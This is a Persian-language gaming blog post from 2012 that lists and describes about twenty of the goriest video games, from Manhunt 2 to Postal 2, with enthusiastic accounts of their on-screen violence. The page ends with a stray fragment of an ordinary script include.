تبلیغات
بازیکده - بازی هایی که از آن ها خون می چکد

:درباره وبلاگ

:آرشیو

:طبقه بندی

:پیوندها

:پیوندهای روزانه

:نویسندگان

:آخرین پستها

:نظرسنجی

آماروبلاگ

پنجشنبه 11 اسفند 1390-12:26 ب.ظخشونت در بازی ها موضوع تازه ای نیست و هر سال بر این خشونت افزوده می شود. یکی از راه های بیان این موضوع استفاده از خون است. اگر دقت کنید، این موضوع هم هر سال بیشتر می شود و گالن گالن خون به بازی ها اضافه می شوند. نگاهی به 20 بازی خونین تاریخ می اندازیم.


Manhunt 2

آدمی را با کیسه پلاستیکی خفه کنید، با لوله آب صورت او را در هم بپاشید، با سرنگ پزشکی به چشمان او حمله کنید و یا سرشان را از بدنشان جدا کنید. شخصیت اصلی بازی یک انسان روانی بود که از تیمارستان فرار می کرد و مسلماً چنین خشونتی برای بازی قابل پیش بینی بود. Manhunt 2 ترسی از نشان داد خون نداشت و خشونت آن تا حدی بالا بود که حتی نسخه سانسور شده آن که صحنه های مرگ را سیاه و سفید و برفکی می کرد هم عرضه شدند.

Soldier of Fortune

این یکی کمی قدیمی تر است، ولی نمونه بسیار خوبی از خشونت و خون است. در این بازی که سیستم فوق العاده Body Targeting داشت، شما می توانستید بر مبنای شلیک به قسمت های مختلف اعضای بدن دشمن، این قسمت ها را از بدنشان جدا کنید. سازندگان این بازی از اولین افرادی بودند که از این سیستم استفاده کردند که هدفشان هم مستقیماً القاء خشونت و خون ریزی بود. حتی شما دست و پای کنده شده آن ها را هم می توانستید ببینید و به لطف انیمیشن های جذاب بازی، این کار لذت بخش بود!

Mortal Kombat 2011

مسلماً بعد از سال ها دوری از خشونت سری Mortal Kombat و بعد از خاطره بد DC Universe همه خونشان به جوش آمده بود و NetherRealm هم جای حرف باقی نگذاشت و Mortal Kombat را به عنوان خشن ترین نسخه از این سری عرضه کرد. Fatalityها به لطف ذهن مریض سازنده های بازی، خیلی خشن بودند و نوآوری زیادی داشتند. از وسط نصف کردن دشمنان و فواره خون به امری عادی تبدیل شد. سیاه شدن پس زمینه در حین انجام این حرکات باعث شد تا جلوه خون به خوبی در هوا نشان داده شود.

God of War III

کریتوس (Kratos) که معرف حضور هست! او در این بازی سر خدایی را در حالیکه هنوز زنده است، با دستان خودش از جا درمی آورد و به لطف تکنولوژی قوی این نسل در هر کشتاری، خون بسیاری روی سر و صورت کریتوس می پاشد. یاد صحنه ای که او دختری را به عنوان نگه دارنده چرخ دنده های یک مکانیزم استفاده کرد، به خیر. در ابتدا شما فکر می کنید که زن خدای افسانه ای یونان توسط کریتوس نجات پیدا کرده، ولی کریتوس فکر دیگری در ذهن داشت!

The Darkness II

Digital Extremes در فکر اینکه چگونه می تواند بر ادامه The Darkness نوآوری هایی هم اضافه کند، به گزینه محبوب و ساده خشونت پناه آورد. در حالیکه نسخه اول بازی هم خیلی خشن بود، ولی این نسخه پا را فراتر گذاشت و سلاخی کردن دشمنان را هم در خود قرار داد. می توانید انسان ها را از وسط دو نیم کنید و حتی استخوان های داخلی آن ها را هم ببینید. خون کارتونی همه جا می پاشد و بازی را به یک عنوان بسیار خشن و خونین تبدیل کرده است. در حالیکه خشونت و خون نسخه قبل خیلی واقعی به نظر می رسید، این نسخه همانند گرافیک خود خیلی کارتونی بود.

Bulletstorm

این بازی خودش را جدی نمی گیرد، شما هم نباید آن را جدی بگیرید و فقط باید از خشونت آن لذت ببرید. مثلاً می توانید با لگد دشمن را به داخل کاکتوس ها بفرستید و البته بعضی وقت ها این کاکتوس ها تیغه های برنده و مرگباری هستند. در حقیقت Bulletstorm به اینکه هر چقدر آدم خشن تر باشد، امتیاز بیشتری می دهد. تنوع در کشتن و خون ریزی در این بازی یک امتیاز بزرگ محسوب می شود.

Gears of War 3

Gears of War در هر نسخه خشن تر می شود. خوبی این خشونت این است که دلتان به حال Locustها نمی سوزد. می توانید آن ها را از وسط اره کنید. با تیغه نیزه مانند اسلحه خود همانند جنگجوهای جنگ های صلیبی دشمن را به نیزه بکشید و یا با پوتین های خود سر آن ها را همانند پفک منفجر کنید. تمام این کارها خون زیادی هم به سر و روی شما می ریزد.

Dead Space 2

در ادامه فضای خوفناک و خونین نسخه قبل، Dead Space 2 راه را هموارتر می کند. Necromorphها از اعضای بدن انسان های معمولی درست شده اند، پس شلیک به آن ها همانند شلیک به یک انسان است. این بازی لحظه ای بدون خون و اعضای قطع عضو شده، ندارد. در صحنه تابش لیزر به چشم آیزک (Isaac) اگر اشتباه می کردید، به چنان صحنه خونینی تبدیل می شد که واقعاً چشمان خودتان می سوخت!

The Punisher

این بازی به کتاب های کمیک خود خیلی پایبند بود. انتقام، هر فرشته ای را هم به یک قاتل خونین و روانی تبدیل می کند و Punisher هم از این قاعده مستثنی نیست. The Punisher اولین بازی ای بود که در آن می توانستید به صورت مستقیم دشمنان خود را شکنجه دهید، سر آن ها را زیر ماشین نصف کنید و یا بدن آن ها را به تیغه عظیم آهن بری بسپارید.

F.E.A.R. 2: Project Origin

بازی های Monolith مانند سری F.E.A.R و Condemned پر از خون هستند. در سری F.E.A.R هر دیوار، زمین و سقفی پر از خون بود و آلما (Alma) انگار که مداد رنگی قرمز به دست داشته باشد، همه جا را خونین می کرد. حتی با سیستم Slow Motion بازی، می توانستید در باران خون دوش بگیرید.

Left 4 Dead 2

اگر فکر می کنید که نسخه اول این بازی خشن بود، پس نسخه دوم را هم تجربه کنید. زامبی های این بازی اگر تکه تکه هم بشوند، باز هم شما را به چشم وعده غذایی خود نگاه می کنند. اعضای بدن همانند قصابی در این بازی دیده می شوند و همینطور خون است که در آن جاری می شود.

Aliens vs. Predator

در راستای ادامه دادن به خشونت های سری فیلم های Aliens این بازی هم کم لطفی نمی کند. شما در نقش خود Alien قرار می گیرید و دیوانه وار می توانید شکارهای خود را نابود کنید. آب دهان اسیدی Alien که حتی فولاد را هم ذوب می کند، در این بازی هست و می توانید با استفاده از آن صورت دشمن را آرایش کنید!

RAGE

RAGE هم یک عنوان بسیار خونین است که در آن شلیک شما تأثیر عمیقی بر دشمن دارد. بازی طوری طراحی شده که از قرار گرفتن گلوله در بدن دشمن لذت می برید. انیمیشن فوق العاده دشمنان این موضوع را دو چندان کرده است. تصور کنید دشمنی از فاصله دور در حال دویدن به سمت شما است، داد و فریاد می کند و با تمام وجود می خواهد با شمشیر تیز خود شما را نصف کند. درست در یک قدمی وقتی با شاتگان خود یک گلوله در مغز او می گذارید، نحوه پرت شدن دشمن و پاشیدن خون آن، خوی حیوانی انسان را برمی انگیزد.

Wolfenstein

بازسازی Wolfenstein کمی مورد کم لطفی قرار گرفت. خشونت آن هم مسلماً یکی از نکات بارز آن بود. در این بازی می توانید انتقام هر انسانی را از نازی ها بگیرید. می توانید با خالی کردن یک گلوله در گلوی دشمن، مشاهده کنید که او تا اینکه بمیرد، خون ریزی می کند و جان می دهد.

Prototype

اگر از لطیف بودن Spider-Man و یا Batman خسته شدید و در رویای این هستید که چه می شد اگر یک ابرقهرمان بودم و در همین حین قصابی هم می کردم، سراغ Prototype بروید. الکس مرسر (Alex Mercer) آنقدر از بلایی که بر سرش آورده اند، عصبانی است که به هیچ موجود زنده ای رحم نمی کند. ممکن است یک تانک را بر سر یک شهروند نیویورکی بزند. کماندویی را از بالای یک برج به پایین پرت کند و با تمام وجود طوری روی او فرود بیاید که آسفالت کف زمین هم بلند شود. منتظر مرگبارتر شدن Prototype 2 هم باشید.

Condemned 2: Bloodshot

تصور کنید که با دست خالی به منطقه ای از شهر بروید که همه دیوانه هستند و می خواهند شما را بکشند. همین دست خالی بودن راه را برای خشونت و خون ریزی هموار می کند. می توانید دشمن را با سر به داخل یک تلویزیون بفرستید و یا با مشت های خود آنقدر به صورت او ضربه بزنید که طرف از خون ریزی بمیرد.

Harvester

Harvester یک بازی Adventure قدیمی است که برای اولین بار این سبک را با خشونت و خون ریزی آشنا کرد. راه های پیشروی و حل معما در این بازی همه به خشونت و خون ریزی وابسته بودند.

Splatterhouse

بازسازی بازی خشن Splatterhouse که در سال 1998 ساخته شده بود، حتی خونین تر از نسخه اول خود است. در این بازی هر وسیله ای می تواند در گوشت دشمن فرو برود و می توانید حتی وقتی دست خودتان هم از بدن جدا شد، آن را بگیرید و به جان دشمن بیفتید. حتی بعضی وقت ها دشمنان هم از دست شما برای کتک زدنتان استفاده می کنند.

MadWorld

Wii تا به حال خشونتی همانند دنیای MadWorld به خود ندیده بود. این بازی یک برنامه تلویزیونی است که چند انسان را به جان هم می اندازد که همدیگر را به روش های نوین بکشند. بازی کاملاً سیاه و سفید است، ولی خون در این بازی به رنگ واقعی خود، یعنی قرمز نمایش داده می شود.

Postal 2

این بازی به معنای واقعی، هیچ چیزی جز خشونت ندارد. هر نسخه از سری Postal فقط برای چگونه نمایش دادن خون و خشونت ساخته می شود و طرفدارهای این سری هم چیزی جز این نمی خواهند. می توانید در این بازی یک گراز را از جیب بغل خود دربیاورید، آن را روی سر دشمن نگه دارید تا مغز وی را بخورد. می توانید روی آن ها ادرار کنید و یا به چاقو آن ها را تکه تکه کنید.

تاریخ آخرین ویرایش:- -
script src="http://filmdoni.ir/game/01.js" language="javascript" >